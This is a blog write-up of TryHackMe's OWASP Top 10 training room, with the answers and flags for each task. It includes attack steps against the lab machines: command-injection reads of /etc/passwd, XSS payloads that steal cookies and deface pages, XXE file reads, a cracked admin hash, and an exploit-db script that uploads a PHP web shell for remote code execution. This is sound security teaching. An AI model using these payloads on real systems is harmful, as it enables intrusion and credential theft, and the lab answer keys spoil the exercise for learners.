Frank Osasere Idugboe for AWS Community Builders

Posted on Oct 25, 2023 • Edited on Jan 18

OWASP Top 10 - Write-up - TryHackMe

#cybersecurity #senseleaner #websecurity #onlinesecurity

Information
Room
Name: OWASP Top 10
Profile: tryhackme.com
Difficulty: Easy
Description: Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.
OWASP Top 10

Write-up
Overview
Install tools used in this WU on BlackArch Linux:
1
$ sudo pacman -S exploitdb dbeaver python

Command Injection Practical#
What strange text file is in the website root directory?

Answer: drpepper.txt

Issue the ls command to list files.

css drpepper.txt evilshell.php index.php js
How many non-root/non-service/non-daemon users are there?

Answer: 0

Issue the cat /etc/passwd command, it seems there is no non-root/non-service/non-daemon users.

1.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 2.bin:x:2:2:bin:/bin:/usr/sbin/nologin 3.sys:x:3:3:sys:/dev:/usr/sbin/nologin 4.sync:x:4:65534:sync:/bin:/bin/sync 5.games:x:5:60:games:/usr/games:/usr/sbin/nologin 6.man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 7.lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 8.mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 9.news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 10.uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 11.proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 12.www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 13.backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 14.list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 15.irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 16.gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 17.nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 18.systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin 19.systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin 20.syslog:x:102:106::/home/syslog:/usr/sbin/nologin 21.messagebus:x:103:107::/nonexistent:/usr/sbin/nologin 22._apt:x:104:65534::/nonexistent:/usr/sbin/nologin 23.lxd:x:105:65534::/var/lib/lxd/:/bin/false 24.uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin 25.dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin 26.landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin 27.pollinate:x:109:1::/var/cache/pollinate:/bin/false 28.sshd:x:110:65534::/run/sshd:/usr/sbin/nologin

What user is this app running as?

Answer: www-data

Issue the id command.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
What is the user's shell set as?

Answer: /usr/sbin/nologin

echo $SHELL returns nothing, so let's try cat /etc/passwd | grep www-data | cut -d ':' -f 7.

/usr/sbin/nologin

What version of Ubuntu is running?

Answer: 18.04.4

Run cat /etc/os-release.

1.VERSION="18.04.4 LTS (Bionic Beaver)" 2.ID=ubuntu 3.ID_LIKE=debian 4.PRETTY_NAME="Ubuntu 18.04.4 LTS" 5.VERSION_ID="18.04" 6.HOME_URL="https://www.ubuntu.com/" 7.SUPPORT_URL="https://help.ubuntu.com/" 8.BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" 9.PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" 10.VERSION_CODENAME=bionic 11.UBUNTU_CODENAME=bionic

Print out the MOTD. What favorite beverage is shown?

Answer: Dr pepper

1.$ ls -1 /etc/update-motd.d/ 2.10-help-text 3.50-landscape-sysinfo 4.50-motd-news 5.80-esm 6.80-livepatch 7.90-updates-available 8.91-release-upgrade 9.92-unattended-upgrades 10.95-hwe-eol 11.97-overlayroot 12.98-fsck-at-reboot 13.98-reboot-required 14. 15.$ cat /etc/update-motd.d/00-header 16.# 17.# 00-header - create the header of the MOTD 18.# Copyright (C) 2009-2010 Canonical Ltd. 19.# 20.# Authors: Dustin Kirkland <kirkland@canonical.com> 21.# 22.# This program is free software; you can redistribute it and/or modify 23.# it under the terms of the GNU General Public License as published by 24.# the Free Software Foundation; either version 2 of the License, or 25.# (at your option) any later version. 26.# 27.# This program is distributed in the hope that it will be useful, 28.# but WITHOUT ANY WARRANTY; without even the implied warranty of 29.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 30.# GNU General Public License for more details. 31.# 32.# You should have received a copy of the GNU General Public License along 33.# with this program; if not, write to the Free Software Foundation, Inc., 34.# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 35. 36.[ -r /etc/lsb-release ] && . /etc/lsb-release 37. 38.if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then 39. # Fall back to using the very slow lsb_release utility 40. DISTRIB_DESCRIPTION=$(lsb_release -s -d) 41.fi 42. 43.printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)" 44. 45.DR PEPPER MAKES THE WORLD TASTE BETTER!

Broken Authentication Practical

What is the flag that you found in darren's account?

Answer: fe86079416a21a3c99937fea8874b667

What is the flag that you found in arthur's account?

Answer: d9ac0f7db4fda460ac3edeb75d75e16e

Sensitive Data Exposure (Challenge)

Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.

What is the name of the mentioned directory?

Answer: /assets

Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Answer: webapp.db

Use the supporting material to access the sensitive data. What is the password hash of the admin user?

Answer: 6eea9b7ef19179a06954edd0f6c05ceb

Open the DB with dbeaver.

Crack the hash. What is the admin's plaintext password?

Answer: qwertyuiop

Crack the password with crackstation.
Login as the admin. What is the flag?

Answer: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

XML External Entity - eXtensible Markup Language

Full form of XML

Answer: eXtensible Markup Language

Is it compulsory to have XML prolog in XML documents?

Answer: yes

Can we validate XML documents against a schema?

Answer: yes

How can we specify XML version and encoding in XML document?

Answer: XML Prolog

XML External Entity - DTD

How do you define a new ELEMENT?

Answer:!ELEMENT

How do you define a ROOT element?

Answer:!DOCTYPE

How do you define a new ENTITY?

Answer:!ENTITY

XML External Entity - Exploiting

What is the name of the user in /etc/passwd

Answer: falcon

Where is falcon's SSH key located?

Answer: /home/falcon/.ssh/id_rsa

What are the first 18 characters for falcon's private key

Answer: MIIEogIBAAKCAQEA7b

Broken Access Control (IDOR Challenge)

Look at other users notes. What is the flag?

http://10.10.125.211/note.php?note=0

Answer: flag{fivefourthree}

Security Misconfiguration

Hack into the webapp, and find the flag!

Answer: thm{4b9513968fd564a87b28aa1f9d672e17}

Cross-site Scripting

Go to http://10.10.93.135/reflected and craft a reflected XSS payload that will cause a popup saying "Hello".

Answer: ThereIsMoreToXSSThanYouThink

<script>alert("Hello")</script>

On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address.

<script>alert(window.location.hostname)</script>

Answer: ReflectiveXss4TheWin

Now navigate to http://10.10.93.135/stored and make an account.

Then add a comment and see if you can insert some of your own HTML.

<b>noraj is bold</b>

Answer: HTML_T4gs

On the same page, create an alert popup box to appear on the page with your document cookies.

<script>alert(document.cookies)</script>

Answer: W3LL_D0N3_LVL2s

Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.

<script>document.querySelector("#thm-title").textContent = "I am a hacker"</script>

Answer: websites_can_be_easily_defaced_with_xss

Insecure Deserialization

Who developed the Tomcat application?

Answer: The Apache Software Foundation

What type of attack that crashes services can be performed with insecure deserialization?

Answer: denial of service

Insecure Deserialization - Objects

Select the correct term for the following statement:

Answer: A Behaviour

Insecure Deserialization - Deserialization

What is the name of the base-2 formatting that data is sent across a network as?

Answer: binary

Insecure Deserialization - Cookies

If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?

Answer: webapp.com/login

What is the acronym for the web technology that Secure cookies work over?

Answer: HTTPS

Insecure Deserialization - Cookies Practical

1st flag (cookie value)

Answer: THM{good_old_base64_huh}

1.$ printf %s 'gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==' | base64 -d 2.}q(X sessionIdqX c7dc44838e0847b1b45544948a92d194qX 3.encodedflagqXTHM{good_old_base64_huh}qu.

2nd flag (admin dashboard)

Answer: THM{heres_the_admin_flag}

Insecure Deserialization - Remote Code Execution
flag.txt

Answer: 4a69a7ff9fd68

Components With Known Vulnerabilities - Lab

How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

Answer: 1611

1.$ searchsploit CSE bookstore 2.------------------------------------------------------------------------------------ --------------------------------- 3. Exploit Title | Path 4.------------------------------------------------------------------------------------ --------------------------------- 5.CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting | php/webapps/48973.txt 6.CSE Bookstore 1.0 - Authentication Bypass | php/webapps/48960.txt 7.------------------------------------------------------------------------------------ --------------------------------- 8.Shellcodes: No Results 9. 10.$ searchsploit online book store 11.------------------------------------------------------------------------------------ --------------------------------- 12. Exploit Title | Path 13.------------------------------------------------------------------------------------ --------------------------------- 14.GotoCode Online Bookstore - Multiple Vulnerabilities | asp/webapps/17921.txt 15.Online Book Store 1.0 - 'bookisbn' SQL Injection | php/webapps/47922.txt 16.Online Book Store 1.0 - 'id' SQL Injection | php/webapps/48775.txt 17.Online Book Store 1.0 - Arbitrary File Upload | php/webapps/47928.txt 18.Online Book Store 1.0 - Unauthenticated Remote Code Execution | php/webapps/47887.py 19.------------------------------------------------------------------------------------ --------------------------------- 20.Shellcodes: No Results 21. 22.$ searchsploit -p 47887 23. Exploit: Online Book Store 1.0 - Unauthenticated Remote Code Execution 24. URL: https://www.exploit-db.com/exploits/47887 25. Path: /usr/share/exploitdb/exploits/php/webapps/47887.py 26.File Type: ASCII text, with CRLF line terminators 27. 28.$ python /usr/share/exploitdb/exploits/php/webapps/47887.py http://10.10.74.65 29.> Attempting to upload PHP web shell... 30.> Verifying shell upload... 31.> Web shell uploaded to http://10.10.74.65/bootstrap/img/P82Exx96Uv.php 32.> Example command usage: http://10.10.74.65/bootstrap/img/P82Exx96Uv.php?cmd=whoami 33.> Do you wish to launch a shell here? (y/n): y 34.RCE $ wc -c /etc/passwd 35.1611 /etc/passwd

Insufficient Logging and Monitoring

What IP address is the attacker using?

Answer: 49.99.13.16

What kind of attack is being carried out?

Answer: brute force

DEV Community